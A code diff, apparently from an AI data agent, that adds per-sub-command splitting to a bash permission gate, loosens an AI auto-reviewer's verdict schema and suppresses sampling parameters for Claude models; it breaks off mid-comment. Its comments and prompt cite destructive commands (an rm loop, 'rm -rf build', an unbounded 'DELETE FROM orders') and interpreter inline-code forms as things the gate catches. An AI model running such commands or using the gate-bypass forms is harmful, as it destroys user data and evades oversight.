         """Look up ``field`` in ``model_specs`` with exact-then-longest-prefix matching.
 
         Longest-prefix is important when specs declare both a generic family key
         (e.g. ``gpt-5``) and a more specific variant (e.g. ``gpt-5.3-codex``): the
         generic key would otherwise bleed into unrelated slugs that happen to
-        share a short prefix. Returns None when the field is missing —
-        OpenRouter-cache-only entries do not carry ``max_tokens``, so callers
-        must tolerate absence.
+        share a short prefix. Returns None when the field is missing or is not
+        an ``expected_type`` — OpenRouter-cache-only entries do not carry
+        ``max_tokens``, so callers must tolerate absence.
+
+        ``expected_type`` keeps numeric specs and capability flags apart. It
+        matters in one direction only: ``bool`` is a subclass of ``int``, so a
+        flag would satisfy an ``int`` lookup, while a number never satisfies a
+        ``bool`` lookup.
         """
         specs = self.model_specs
+
+        def _typed(spec: Any) -> bool:
+            return isinstance(spec, dict) and isinstance(spec.get(field), expected_type)
+
         exact = specs.get(self.model_name)
-        if isinstance(exact, dict) and isinstance(exact.get(field), int):
+        if _typed(exact):
             return exact[field]
         best_key: Optional[str] = None
         for spec_model, spec in specs.items():
-            if not isinstance(spec, dict) or not isinstance(spec.get(field), int):
+            if not _typed(spec):
                 continue
             if self.model_name.startswith(spec_model) and (best_key is None or len(spec_model) > len(best_key)):
                 best_key = spec_model
         if best_key is None:
             return None
         return specs[best_key][field]
+
+    def _lookup_spec(self, field: str) -> Optional[int]:
+        """Numeric spec lookup (``max_tokens``, ``context_length``)."""
+        return self._lookup_spec_typed(field, int)
+
+    def supports_temperature(self) -> bool:
+        """Whether the model accepts a ``temperature`` parameter at all.
+
+        Newer Anthropic models (the claude-*-5 family) reject the request
+        outright with ``"`temperature` is deprecated for this model."``, so
+        sending the non-reasoning default of 0.7 made them unusable for every
+        call. Declared per model via ``model_specs.supports_temperature`` in
+        ``providers.yml``; absent means supported, which keeps every existing
+        model on its current behavior.
+        """
+        flag = self._lookup_spec_typed("supports_temperature", bool)
+        return True if flag is None else bool(flag)
 
     def max_tokens(self) -> Optional[int]:
         """Max tokens from model specs with prefix matching, or None if unavailable."""

--- a/datus/models/openai_compatible.py
+++ b/datus/models/openai_compatible.py
@@ -549,6 +549,33 @@ class OpenAICompatibleModel(LLMBaseModel):
                 logger.error(f"Unexpected error in {operation_name}: {str(e)}")
                 raise
 
+    def _suppresses_sampling_params(self) -> bool:
+        """True when the routed provider rejects ``temperature`` / ``top_p``.
+
+        Neither sampling knob is ever sent to Anthropic:
+          * ``top_p`` — rejected alongside ``temperature`` with HTTP 400 /
+            ``invalid_request_error`` (the claude-sonnet-4.x family enforces
+            this strictly).
+          * ``temperature`` — the claude-*-5 family rejects it outright
+            ("`temperature` is deprecated for this model."), which made those
+            models fail EVERY call.
+
+        Gating on the family rather than a per-model spec means a newly
+        released Claude model works on day one instead of 400ing until the
+        catalog catches up. The gate reads the **routed** provider
+        (``litellm_adapter.provider``), not the model class — operators may
+        configure ``type=openai`` with a Claude model name, in which case
+        ``LiteLLMAdapter`` auto-routes to Anthropic and the suppression must
+        still apply. ``anthropic`` is covered as the documented alias of
+        ``claude`` (see :class:`~datus.utils.constants.LLMProvider`) so a
+        routed provider under either spelling is treated the same.
+
+        Every request path must consult this: ``generate`` for completions and
+        ``_build_agent`` for the Agents-SDK tool / streaming path. Anthropic
+        applies its own defaults for both parameters.
+        """
+        return getattr(self.litellm_adapter, "provider", "") in (LLMProvider.CLAUDE, LLMProvider.ANTHROPIC)
+
     def generate(self, prompt: Any, enable_thinking: bool | None = None, **kwargs) -> str:
         """
         Generate a response from the model with error handling and retry logic.
@@ -582,24 +609,13 @@ class OpenAICompatibleModel(LLMBaseModel):
             if self.default_headers:
                 params["extra_headers"] = self.default_headers
 
-            # Neither sampling knob is ever sent to Anthropic:
-            #   * ``top_p`` — rejected alongside ``temperature`` with HTTP 400 /
-            #     ``invalid_request_error`` (the claude-sonnet-4.x family
-            #     enforces this strictly).
-            #   * ``temperature`` — the claude-*-5 family rejects it outright
-            #     ("`temperature` is deprecated for this model."), which made
-            #     those models fail EVERY call. Gating on the family rather
-            #     than per-model spec means a newly released Claude model works
-            #     on day one instead of 400ing until the catalog catches up.
-            # The gate is the **routed** provider (``litellm_adapter.provider``),
-            # not the model class — operators may configure ``type=openai`` but a
-            # Claude model name, in which case ``LiteLLMAdapter`` auto-routes to
-            # Anthropic and the suppression must still apply.
+            routed_provider = getattr(self.litellm_adapter, "provider", "")
+
+            # Neither sampling knob is ever sent to Anthropic — see
+            # ``_suppresses_sampling_params`` for which providers and why.
             # Suppression is unconditional, ahead of kwargs and model_config
             # alike: no caller-supplied value can make such a request valid.
-            # Anthropic applies its own defaults for both.
-            routed_provider = getattr(self.litellm_adapter, "provider", "")
-            suppress_sampling_params = routed_provider == LLMProvider.CLAUDE
+            suppress_sampling_params = self._suppresses_sampling_params()
             suppress_top_p = suppress_sampling_params
 
             # Add temperature: priority is kwargs > model_config > default (0.7).
@@ -1069,10 +1085,16 @@ class OpenAICompatibleModel(LLMBaseModel):
         # Build ModelSettings with provider-specific configurations
         model_settings_kwargs = {"include_usage": True}
 
-        if self.model_config.temperature is not None:
+        # Same gate the completion path applies (see
+        # ``_suppresses_sampling_params``): a configured value must not reach
+        # Anthropic through the Agents-SDK tool / streaming path either, or a
+        # claude-*-5 tool call 400s on a knob the completion path already drops.
+        suppress_sampling_params = self._suppresses_sampling_params()
+
+        if not suppress_sampling_params and self.model_config.temperature is not None:
             model_settings_kwargs["temperature"] = self.model_config.temperature
 
-        if self.model_config.top_p is not None:
+        if not suppress_sampling_params and self.model_config.top_p is not None:
             model_settings_kwargs["top_p"] = self.model_config.top_p
 
         # Apply model_specs.max_tokens as a fallback so streaming/tool calls

--- a/datus/schemas/action_history.py
+++ b/datus/schemas/action_history.py
@@ -4,7 +4,7 @@
 
 from datetime import datetime
 from enum import Enum
-from typing import Any, List, Optional
+from typing import Any, Callable, List, Optional
 
 from pydantic import BaseModel, Field
 
@@ -90,6 +90,26 @@ class ActionHistory(BaseModel):
         use_enum_values = True
 
 
+# Callbacks that may enrich an action before it enters the history. Every model
+# implementation funnels its actions through ``ActionHistoryManager.add_action``,
+# so this is the one place a cross-cutting annotation can be attached without
+# schemas depending on the layer that produces it (the permission gate registers
+# ``review_registry``'s stamper here). Enrichers mutate in place and must never
+# raise — a display annotation can't be allowed to drop an action.
+_ACTION_ENRICHERS: List[Callable[[ActionHistory], None]] = []
+
+
+def register_action_enricher(enricher: Callable[[ActionHistory], None]) -> None:
+    """Register a callback invoked on every action entering a history manager."""
+    if enricher not in _ACTION_ENRICHERS:
+        _ACTION_ENRICHERS.append(enricher)
+
+
+def clear_action_enrichers() -> None:
+    """Drop all registered enrichers (tests)."""
+    _ACTION_ENRICHERS.clear()
+
+
 class ActionHistoryManager:
     """Manager for action history during streaming execution"""
 
@@ -103,6 +123,12 @@ class ActionHistoryManager:
         if self.find_action_by_id(action.action_id):
             logger.debug(f"Action with id {action.action_id} already exists, skipping duplicate")
             return
+
+        for enricher in _ACTION_ENRICHERS:
+            try:
+                enricher(action)
+            except Exception as e:  # pragma: no cover - defensive
+                logger.warning(f"Action enricher {enricher!r} failed: {e}")
 
         logger.debug(f"Adding action: {action}")
         self.actions.append(action)

--- a/datus/tools/permission/__init__.py
+++ b/datus/tools/permission/__init__.py
@@ -9,6 +9,7 @@ This module provides pattern-based permission control (allow/deny/ask)
 for all tool types in Datus-agent, following Claude Code and OpenCode patterns.
 """
 
+from datus.schemas.action_history import register_action_enricher
 from datus.tools.permission.bash_classifier import (
     BashClassifierContext,
     BashCommandClassifier,
@@ -35,8 +36,19 @@ from datus.tools.permission.permission_hooks import (
     PermissionHooks,
 )
 from datus.tools.permission.permission_manager import PermissionManager
+from datus.tools.permission.review_registry import (
+    PERMISSION_REVIEW_OUTPUT_KEY,
+    enrich_action,
+)
+
+# Wire the AI-review annotation into every action history at import time. The
+# permission package owns the dependency direction: ``datus.schemas`` stays
+# unaware of reviews, and any consumer that imports the permission system gets
+# reviewed tool actions annotated for display.
+register_action_enricher(enrich_action)
 
 __all__ = [
+    "PERMISSION_REVIEW_OUTPUT_KEY",
     "PermissionLevel",
     "AutoReviewConfig",
     "PermissionRule",

--- a/datus/tools/permission/__init__.py
+++ b/datus/tools/permission/__init__.py
@@ -18,6 +18,7 @@ from datus.tools.permission.bash_classifier import (
 from datus.tools.permission.bash_rules import (
     BashCommandRules,
     BashRuleDecision,
+    BashSegmentDecision,
     evaluate_bash_command,
 )
 from datus.tools.permission.permission_config import (
@@ -46,6 +47,7 @@ __all__ = [
     "CompositeHooks",
     "BashCommandRules",
     "BashRuleDecision",
+    "BashSegmentDecision",
     "evaluate_bash_command",
     "SqlStatementRules",
     "classify_sql_kind",

--- a/datus/tools/permission/auto_reviewer.py
+++ b/datus/tools/permission/auto_reviewer.py
@@ -43,25 +43,55 @@ class ReviewDecision(str, Enum):
 
 
 class AutoReviewVerdict(BaseModel):
-    """Strict wire result returned by the reviewer model."""
+    """Wire result returned by the reviewer model.
+
+    Validation here is deliberately no stricter than the transport can
+    guarantee. Only schema-capable adapters constrain the model's decoding:
+    ``CodexModel`` passes the schema as the Responses API's
+    ``text.format.json_schema``, and it is enforced. Everything routed through
+    ``OpenAICompatibleModel.generate_with_json_output`` — which includes every
+    Claude model, since ``ClaudeModel`` does not override it — drops the schema
+    kwarg and asks for ``response_format={"type": "json_object"}``, and
+    Anthropic has no such mode at all. On that path the schema reaches the model
+    only as the ``required_response_schema`` text in the request body: a
+    suggestion, not a grammar.
+
+    So a field constraint that the model can violate is a constraint that
+    fails the whole review closed into a manual prompt. Observed in practice:
+    the reviewer returned all five required fields, correctly, alongside one
+    volunteered sixth (``requires_confirmation``, ``user_authorization_reason``,
+    ``confidence_note`` on separate occasions) — a model explaining or
+    qualifying its own answer. ``extra="forbid"`` threw the usable verdict away
+    each time and auto mode silently degraded to ask-everything.
+    """
 
     risk_level: ReviewRiskLevel
     user_authorization: UserAuthorization
     decision: ReviewDecision
     confidence: float = Field(ge=0.0, le=1.0)
     # The system prompt asks for ~70 characters so the verdict fits one CLI
-    # line. This bound is deliberately looser: it is a guard against a runaway
-    # essay, not the style rule. Enforcing the display budget here would turn a
-    # slightly-too-long but perfectly good verdict into a validation failure,
-    # which fails closed into a manual prompt — strictly worse than a truncated
-    # line. Overruns are truncated at render time instead.
+    # line. The bound is deliberately far looser: it is a guard against a
+    # runaway essay, not the style rule. Enforcing the display budget here would
+    # turn a slightly-too-long but perfectly good verdict into a validation
+    # failure — strictly worse than a truncated line. Overruns are truncated at
+    # render time instead. ``description`` rides along in the emitted schema, so
+    # the length request still reaches the model where it can act on it.
     rationale: str = Field(
         min_length=1,
-        max_length=200,
+        max_length=1000,
         description="One clause naming the material effect; about 70 characters, rendered on a single line",
     )
 
-    model_config = ConfigDict(extra="forbid")
+    # Unknown keys are dropped rather than rejected. They carry no authority —
+    # ``can_auto_allow`` reads only ``decision``, ``risk_level`` and
+    # ``confidence``, and deny rules, the safety ceiling and the high/critical
+    # forced-ask all sit outside this model — so ignoring them cannot widen what
+    # runs. ``json_schema_extra`` keeps ``additionalProperties: false`` in the
+    # emitted schema on purpose: the model should still be told not to add
+    # fields, and the schema-capable adapters need it (OpenAI's strict
+    # json_schema mode rejects a schema without it). Tell the model not to;
+    # don't discard its answer when it does anyway.
+    model_config = ConfigDict(extra="ignore", json_schema_extra={"additionalProperties": False})
 
     def can_auto_allow(self, config: AutoReviewConfig) -> bool:
         return (

--- a/datus/tools/permission/auto_reviewer.py
+++ b/datus/tools/permission/auto_reviewer.py
@@ -161,7 +161,7 @@ it about 70 characters. Write one clause naming the material effect of THIS
 action. Do not restate the command, and do not state the risk level or decision
 — both are already displayed next to your text. Drop lead-ins ("This command
 performs...") and closing judgements ("...so it is low risk"). Anything longer
-is truncated mid-word and the reader loses the end.
+is middle-truncated and the reader loses its middle section.
 
 These illustrate length and shape for OTHER actions; never reuse their wording,
 describe the action you were actually given:

--- a/datus/tools/permission/auto_reviewer.py
+++ b/datus/tools/permission/auto_reviewer.py
@@ -49,7 +49,17 @@ class AutoReviewVerdict(BaseModel):
     user_authorization: UserAuthorization
     decision: ReviewDecision
     confidence: float = Field(ge=0.0, le=1.0)
-    rationale: str = Field(min_length=1, max_length=1000)
+    # The system prompt asks for ~70 characters so the verdict fits one CLI
+    # line. This bound is deliberately looser: it is a guard against a runaway
+    # essay, not the style rule. Enforcing the display budget here would turn a
+    # slightly-too-long but perfectly good verdict into a validation failure,
+    # which fails closed into a manual prompt — strictly worse than a truncated
+    # line. Overruns are truncated at render time instead.
+    rationale: str = Field(
+        min_length=1,
+        max_length=200,
+        description="One clause naming the material effect; about 70 characters, rendered on a single line",
+    )
 
     model_config = ConfigDict(extra="forbid")
 
@@ -144,7 +154,21 @@ Specific guidance:
 - decision=allow is permitted only for low or medium risk with no explicit security-policy concern.
 - high and critical always use decision=ask. Static hard denies are outside your authority.
 
-Return only JSON matching the supplied schema. Keep rationale to one concise sentence."""
+Return only JSON matching the supplied schema.
+
+The rationale is rendered on a single CLI line beside the verdict, which leaves
+it about 70 characters. Write one clause naming the material effect of THIS
+action. Do not restate the command, and do not state the risk level or decision
+— both are already displayed next to your text. Drop lead-ins ("This command
+performs...") and closing judgements ("...so it is low risk"). Anything longer
+is truncated mid-word and the reader loses the end.
+
+These illustrate length and shape for OTHER actions; never reuse their wording,
+describe the action you were actually given:
+  rm -rf build          -> deletes build/ in the workspace, artifacts regenerable
+  DELETE FROM orders    -> unbounded delete, no predicate, not recoverable
+  npm ci                -> reinstalls declared deps, no source writes
+  cat app.log | grep ERR -> reads a local log, no mutation or egress"""
 
 
 class LLMAutoReviewer(AutoReviewer):

--- a/datus/tools/permission/bash_rules.py
+++ b/datus/tools/permission/bash_rules.py
@@ -866,7 +866,11 @@ def evaluate_bash_command(command: str, rules: BashCommandRules) -> BashRuleDeci
                 level=PermissionLevel.ASK,
                 source=BashDecisionSource.SAFETY,
                 matched_pattern=None,
-                reason="Command contains shell metacharacters",
+                # Not every failure here is a metacharacter — an empty segment
+                # (``ls &&``, ``a;; b``) is a malformed chain. This text reaches
+                # the user through the prompt body and the AI reviewer through
+                # ``static_assessment.reason``, so it names the real cause.
+                reason="Command uses a shell construct that cannot be split into sub-commands",
                 bucket=command.strip().split()[0],
                 safety_forced=True,
             ),

--- a/datus/tools/permission/bash_rules.py
+++ b/datus/tools/permission/bash_rules.py
@@ -22,13 +22,16 @@ express ``git status``):
   positional argument is matched to prevent smuggling a disallowed flag in
   front (mirrors the rationale in ``BashTool._matches_pattern``).
 
-Pipelines: a pure pipeline (``a | b | c`` — only top-level, unquoted ``|``)
-is split into segments and each segment is judged independently, then the
-results are aggregated (any DENY -> DENY; any safety-forced -> ASK; all ALLOW
--> ALLOW; otherwise ASK). This lets a pipeline of allow-listed read-only
-commands (``cat log | grep err | wc -l``) auto-run. Every OTHER shell
-construct (``&&``, ``;``, ``||``, ``$()``, redirection) hits the safety
-ceiling, so these static rules never allow it on their own.
+Sub-commands: a command chained with top-level, unquoted ``|``, ``&&``,
+``||`` or ``;`` is split into sub-commands and each is judged independently,
+then the results are aggregated (any DENY -> DENY; any safety-forced -> ASK;
+all ALLOW -> ALLOW; otherwise ASK). This lets a chain of allow-listed
+read-only commands (``cat log | grep err | wc -l``, ``git fetch && git
+status``) auto-run, and — just as importantly — lets the confirmation prompt
+name EVERY sub-command that needs approval instead of one representative.
+Shell constructs that segmentation cannot model still hit the safety ceiling
+as a whole: ``$()``, backticks, ``${}``, redirection, background ``&``,
+``|&``, newlines, subshells/braces and compound keywords (``for``/``if``/…).
 
 The safety ceiling is a *static* verdict, not a final one: under a profile with
 ``permissions.auto_review`` enabled the shared reviewer in ``auto_reviewer.py``
@@ -46,9 +49,11 @@ asymmetry of aggressive deny / conservative allow):
                                  (``bash -c`` re-introduces a shell that the
                                  outer argv match is blind to), interpreter
                                  inline-code flags (``python -c`` / ``perl -e``
-                                 execute a string the rules cannot see), and
-                                 non-pipe shell metacharacters; allow rules
-                                 cannot override
+                                 execute a string the rules cannot see),
+                                 compound-construct fragments (``for``, ``do``,
+                                 ``(``, ``{`` — segmentation does not model
+                                 them), and residual shell metacharacters;
+                                 allow rules cannot override
 4. ask rules                  -> ASK (anchored)
 5. allow rules                -> ALLOW (anchored only, never unanchored)
 6. rules.default              -> usually ASK
@@ -60,7 +65,7 @@ override for the shared automatic reviewer settings.
 import fnmatch
 import re
 import shlex
-from dataclasses import dataclass
+from dataclasses import dataclass, replace
 from enum import Enum
 from typing import Any, Dict, List, Optional, Tuple
 
@@ -77,12 +82,41 @@ logger = get_logger(__name__)
 # command substitution, chaining, or redirection, so commands containing them
 # never auto-allow (they hit the safety ceiling → confirmation).
 #
-# ``|`` is deliberately excluded here: a pure pipeline (``a | b | c``) is
-# split into segments by ``split_pipeline`` and each segment is judged on its
-# own, so pipelines of allow-listed read-only commands can auto-run. ``||``
-# (logical OR) is NOT a pipeline — ``split_pipeline`` returns None for it and
-# the caller falls back to this safety ceiling.
+# ``|`` is deliberately excluded here: chained commands are split into
+# sub-commands by ``split_command_chain`` before this check runs, so each
+# segment is judged on its own and chains of allow-listed read-only commands
+# can auto-run. The regex still lists ``;``/``&``/``&&``/``||`` because a
+# segment reaching this check kept them (an un-splittable form such as
+# background ``&``), and because ``BashTool._segment_allowed`` shares this
+# function with only ``split_pipeline`` in front of it.
 _SHELL_METACHARS_RE = re.compile(r"[;&<>`\n]|\$\(|\$\{|\|\||&&")
+
+# Shell keywords and grouping constructs. Segmentation splits on operators but
+# does not model compound commands, so ``for f in *; do rm $f; done`` arrives
+# here as three fragments (``for f in *``, ``do rm $f``, ``done``) that must
+# never be approved as three ordinary commands. Any fragment that opens or
+# belongs to such a construct hits the safety ceiling, which forces the WHOLE
+# chain to a confirmation prompt with no project-persistence option.
+_SHELL_KEYWORDS = frozenset(
+    {
+        "for",
+        "while",
+        "until",
+        "if",
+        "then",
+        "elif",
+        "else",
+        "fi",
+        "do",
+        "done",
+        "case",
+        "esac",
+        "in",
+        "select",
+        "function",
+        "coproc",
+    }
+)
 
 
 def contains_shell_metachars(text: str) -> bool:
@@ -168,6 +202,22 @@ def _has_inline_code_flag(argv: List[str]) -> bool:
         if any(letter in token[1:] for letter in short_letters):
             return True
     return False
+
+
+def _is_compound_construct(command: str, argv: List[str]) -> bool:
+    """True when a segment belongs to a compound shell construct.
+
+    ``split_command_chain`` splits on control operators but does not model
+    loops, conditionals, subshells or brace groups, so ``for f in *; do rm $f;
+    done`` arrives as three fragments. Treating those as three ordinary
+    commands would let ``do rm $f`` be approved (and persisted) as ``rm:*``.
+    Detected by a leading shell keyword or an unbalanced grouping character,
+    both of which force the whole chain to the safety ceiling.
+    """
+    if argv and argv[0] in _SHELL_KEYWORDS:
+        return True
+    stripped = command.strip()
+    return bool(stripped) and (stripped[0] in "({" or stripped[-1] in ")}")
 
 
 # Multi-command CLIs whose first subcommand carries the semantics; session
@@ -345,6 +395,24 @@ class BashDecisionSource(str, Enum):
 
 
 @dataclass(frozen=True)
+class BashSegmentDecision:
+    """One sub-command's contribution to an ASK decision.
+
+    Carries everything the confirmation prompt and the grant writers need:
+    the segment text (so the prompt can name each sub-command), its own
+    session bucket, and its own rule provenance.
+    """
+
+    command: str
+    level: PermissionLevel
+    source: BashDecisionSource
+    matched_pattern: Optional[str]
+    reason: str
+    bucket: str
+    safety_forced: bool = False
+
+
+@dataclass(frozen=True)
 class BashRuleDecision:
     """Result of evaluating one bash command against a ruleset.
 
@@ -353,8 +421,10 @@ class BashRuleDecision:
         source: Which stage of the decision order produced it.
         matched_pattern: The rule pattern that fired, when source is a rule.
         reason: Human-readable explanation for prompts and logs.
-        bucket: Session-approval bucket key (e.g. ``git push`` or an ask-rule
-            pattern) — "always allow" grants are scoped to this bucket.
+        bucket: Session-approval bucket key of the REPRESENTATIVE sub-command
+            (e.g. ``git push`` or an ask-rule pattern). Kept for logging and
+            for the hook's profile-default fallback; grants are scoped per
+            ``ask_segments`` entry, not to this single bucket.
         safety_forced: True when the ASK came from the safety ceiling or an
             unparseable command. Such decisions are never auto-resolved by the
             deprecated bash-only classifier seam, and are never offered as
@@ -364,12 +434,11 @@ class BashRuleDecision:
             wrapper, metacharacter, or ``$()`` is judged on its actual effect).
             Genuinely unparseable commands stay behind direct user
             confirmation — the reviewer is never consulted for them.
-        segment_ask_patterns: For an ASK pipeline decision, the
-            ``(source, matched_pattern)`` of EVERY non-allow segment. The hook's
-            project-grant bypass must cover each segment, not just the
-            representative one — otherwise a grant for one plugin ask rule
-            would auto-run an entire pipeline including unreviewed segments.
-            ``None`` for single-command decisions.
+        ask_segments: For an ASK decision, EVERY non-allow sub-command in
+            source order (a one-element tuple for a plain single command).
+            The prompt lists them all and the session/project grants cover
+            them all — approving one representative must never green-light
+            unreviewed sub-commands. Empty for ALLOW/DENY decisions.
     """
 
     level: PermissionLevel
@@ -378,7 +447,7 @@ class BashRuleDecision:
     reason: str
     bucket: str
     safety_forced: bool = False
-    segment_ask_patterns: Optional[Tuple[Tuple[BashDecisionSource, Optional[str]], ...]] = None
+    ask_segments: Tuple[BashSegmentDecision, ...] = ()
 
 
 def _split_pattern(pattern: str) -> tuple[List[str], Optional[str]]:
@@ -451,23 +520,14 @@ def session_bucket_for(argv: List[str], matched_pattern: Optional[str]) -> str:
     return argv[0]
 
 
-def split_pipeline(command: str) -> Optional[List[str]]:
-    """Split a command on top-level, unquoted ``|`` into pipeline segments.
+def _split_top_level(command: str, *, chain: bool) -> Optional[List[str]]:
+    """Split on top-level, unquoted control operators.
 
-    Shared by the permission layer (per-segment judging) and the execution
-    layer (legacy ``allowed_patterns`` matching) so the *same* segmentation is
-    judged and run.
-
-    Returns:
-        * ``[command]`` — no top-level pipe (a plain single command).
-        * ``["seg1", "seg2", ...]`` — a clean pipeline, each part stripped.
-        * ``None`` — NOT a simple pipeline: ``||`` (logical OR), ``|&``
-          (stderr pipe), an empty segment (``ls |``, ``| ls``), or unbalanced
-          quotes. The caller routes these to the safety ceiling.
-
-    Only single/double quotes and backslash escaping are tracked — enough to
-    keep ``grep "a|b"`` and ``echo \\|`` from being treated as pipe splits.
-    Other shell metacharacters are handled separately by the caller.
+    ``chain=False`` splits on ``|`` only; ``chain=True`` also splits on
+    ``&&``, ``||`` and ``;``. Only single/double quotes and backslash escaping
+    are tracked — enough to keep ``grep "a|b"``, ``git commit -m "fix; bug"``
+    and ``find ... -exec ls {} \\;`` from being split. Returns ``None`` when
+    the string is not cleanly segmentable (see the public wrappers).
     """
     segments: List[str] = []
     buf: List[str] = []
@@ -489,14 +549,32 @@ def split_pipeline(command: str) -> Optional[List[str]]:
             in_single = not in_single
         elif c == '"' and not in_single:
             in_double = not in_double
-        elif c == "|" and not in_single and not in_double:
+        elif c in "|&;" and not in_single and not in_double:
             nxt = command[i + 1] if i + 1 < n else ""
-            if nxt in ("|", "&"):
-                # `||` (logical OR) / `|&` (stderr pipe) are not simple pipes.
-                return None
+            if c == "|":
+                if nxt == "&":
+                    # `|&` (stderr pipe) is not a plain pipe.
+                    return None
+                if nxt == "|" and not chain:
+                    # `||` (logical OR) is not a pipeline.
+                    return None
+                step = 2 if nxt == "|" else 1
+            elif not chain:
+                # `&` / `;` are ordinary characters for the pipeline-only
+                # splitter; the caller's metacharacter check rejects them.
+                buf.append(c)
+                i += 1
+                continue
+            elif c == "&":
+                if nxt != "&":
+                    # A lone `&` backgrounds the command — not a sequencer.
+                    return None
+                step = 2
+            else:  # ";"
+                step = 1
             segments.append("".join(buf))
             buf = []
-            i += 1
+            i += step
             continue
         buf.append(c)
         i += 1
@@ -507,6 +585,40 @@ def split_pipeline(command: str) -> Optional[List[str]]:
     if any(s == "" for s in stripped):
         return None
     return stripped
+
+
+def split_pipeline(command: str) -> Optional[List[str]]:
+    """Split a command on top-level, unquoted ``|`` into pipeline segments.
+
+    Used by the execution layer (``BashTool._is_command_allowed``, the legacy
+    ``allowed_patterns`` whitelist for skills). Deliberately narrower than
+    :func:`split_command_chain`: that whitelist is a separate trust boundary
+    and must keep rejecting every non-pipe construct outright.
+
+    Returns:
+        * ``[command]`` — no top-level pipe (a plain single command).
+        * ``["seg1", "seg2", ...]`` — a clean pipeline, each part stripped.
+        * ``None`` — NOT a simple pipeline: ``||`` (logical OR), ``|&``
+          (stderr pipe), an empty segment (``ls |``, ``| ls``), or unbalanced
+          quotes. The caller routes these to the safety ceiling.
+    """
+    return _split_top_level(command, chain=False)
+
+
+def split_command_chain(command: str) -> Optional[List[str]]:
+    """Split a command into sub-commands on ``|``, ``&&``, ``||`` and ``;``.
+
+    Used by the permission layer so every sub-command is judged, displayed and
+    granted on its own. Returns ``None`` — routing the whole command to the
+    safety ceiling — for forms that cannot be segmented safely: ``|&``, a lone
+    background ``&``, an empty segment (``ls &&``, ``;;``, ``| ls``) or
+    unbalanced quotes.
+
+    Note that ``None`` is not the only path to the safety ceiling: a segment
+    that still carries ``$()``, backticks, redirection or a newline is caught
+    per-segment by :func:`contains_shell_metachars`.
+    """
+    return _split_top_level(command, chain=True)
 
 
 def _evaluate_single_command(command: str, rules: BashCommandRules) -> BashRuleDecision:
@@ -566,8 +678,17 @@ def _evaluate_single_command(command: str, rules: BashCommandRules) -> BashRuleD
                 safety_forced=False,
             )
 
-    # 2. Safety ceiling — wrappers and shell metacharacters can never
-    # auto-allow, regardless of allow rules.
+    # 2. Safety ceiling — wrappers, compound-construct fragments and shell
+    # metacharacters can never auto-allow, regardless of allow rules.
+    if _is_compound_construct(command, argv):
+        return BashRuleDecision(
+            level=PermissionLevel.ASK,
+            source=BashDecisionSource.SAFETY,
+            matched_pattern=None,
+            reason=f"'{command.strip()}' is part of a compound shell construct that the rules cannot decompose",
+            bucket=session_bucket_for(argv, None),
+            safety_forced=True,
+        )
     if argv[0] in _WRAPPER_COMMANDS:
         return BashRuleDecision(
             level=PermissionLevel.ASK,
@@ -631,49 +752,59 @@ def _evaluate_single_command(command: str, rules: BashCommandRules) -> BashRuleD
     )
 
 
-# Severity for picking the representative segment of a pipeline that is neither
-# fully allowed nor denied/safety-forced. An ask-rule segment outranks a
-# default segment so the pipeline's overall source is ASK_RULE — this matters
+# Severity for picking the representative sub-command of a chain that is
+# neither fully allowed nor denied/safety-forced. An ask-rule segment outranks
+# a default segment so the chain's overall source is ASK_RULE — this matters
 # because the hook's dangerous-profile fallback only re-evaluates DEFAULT
 # decisions, so a DEFAULT representative could let a permissive profile swallow
 # an ask-rule segment.
-_PIPELINE_ASK_SEVERITY = {
+_ASK_SEVERITY = {
     BashDecisionSource.ASK_RULE: 2,
     BashDecisionSource.DEFAULT: 1,
 }
 
 
-def _evaluate_pipeline(command: str, segments: List[str], rules: BashCommandRules) -> BashRuleDecision:
-    """Aggregate per-segment decisions for a clean pipeline (``a | b | c``).
+def _as_segment(command: str, decision: BashRuleDecision) -> BashSegmentDecision:
+    """Project a per-segment ``BashRuleDecision`` onto a segment record."""
+    return BashSegmentDecision(
+        command=command.strip(),
+        level=decision.level,
+        source=decision.source,
+        matched_pattern=decision.matched_pattern,
+        reason=decision.reason,
+        bucket=decision.bucket,
+        safety_forced=decision.safety_forced,
+    )
 
-    * any segment DENY                 -> DENY
-    * any segment safety_forced        -> ASK (safety_forced)
-    * all segments ALLOW               -> ALLOW
-    * otherwise                        -> ASK, represented by the most severe
-      non-allow segment (ask-rule over default) for bucket/source/pattern.
+
+def _with_ask_segments(command: str, decision: BashRuleDecision) -> BashRuleDecision:
+    """Attach the single-command ask segment so callers have one code path."""
+    if decision.level != PermissionLevel.ASK:
+        return decision
+    return replace(decision, ask_segments=(_as_segment(command, decision),))
+
+
+def _evaluate_chain(segments: List[str], rules: BashCommandRules) -> BashRuleDecision:
+    """Aggregate per-sub-command decisions for a chain (``a | b && c; d``).
+
+    * any sub-command DENY             -> DENY
+    * all sub-commands ALLOW           -> ALLOW
+    * otherwise                        -> ASK carrying EVERY non-allow
+      sub-command in ``ask_segments``; ``safety_forced`` when any of them is,
+      and represented by the most severe one (ask-rule over default) for
+      bucket/source/pattern.
     """
     decisions = [_evaluate_single_command(seg, rules) for seg in segments]
 
-    for d in decisions:
+    for seg, d in zip(segments, decisions):
         if d.level == PermissionLevel.DENY:
             return BashRuleDecision(
                 level=PermissionLevel.DENY,
                 source=BashDecisionSource.DENY_RULE,
                 matched_pattern=d.matched_pattern,
-                reason=f"Pipeline blocked: segment matched deny rule '{d.matched_pattern}'",
+                reason=f"Sub-command '{seg}' matched deny rule '{d.matched_pattern}'",
                 bucket=d.bucket,
                 safety_forced=False,
-            )
-
-    for d in decisions:
-        if d.safety_forced:
-            return BashRuleDecision(
-                level=PermissionLevel.ASK,
-                source=BashDecisionSource.SAFETY,
-                matched_pattern=None,
-                reason=f"Pipeline requires confirmation: {d.reason}",
-                bucket=d.bucket,
-                safety_forced=True,
             )
 
     if all(d.level == PermissionLevel.ALLOW for d in decisions):
@@ -682,58 +813,67 @@ def _evaluate_pipeline(command: str, segments: List[str], rules: BashCommandRule
             level=PermissionLevel.ALLOW,
             source=BashDecisionSource.ALLOW_RULE,
             matched_pattern=None,
-            reason=f"Pipeline allowed: all segments matched allow rules ({patterns})",
+            reason=f"All sub-commands matched allow rules ({patterns})",
             bucket=session_bucket_for(shlex.split(segments[0]), None),
             safety_forced=False,
         )
 
-    non_allow = [d for d in decisions if d.level != PermissionLevel.ALLOW]
-    rep = max(non_allow, key=lambda d: _PIPELINE_ASK_SEVERITY.get(d.source, 0))
+    ask_segments = tuple(_as_segment(seg, d) for seg, d in zip(segments, decisions) if d.level != PermissionLevel.ALLOW)
+    # A safety-forced sub-command pins the whole chain to the safety ceiling —
+    # but unlike the old short-circuit, the other sub-commands stay visible so
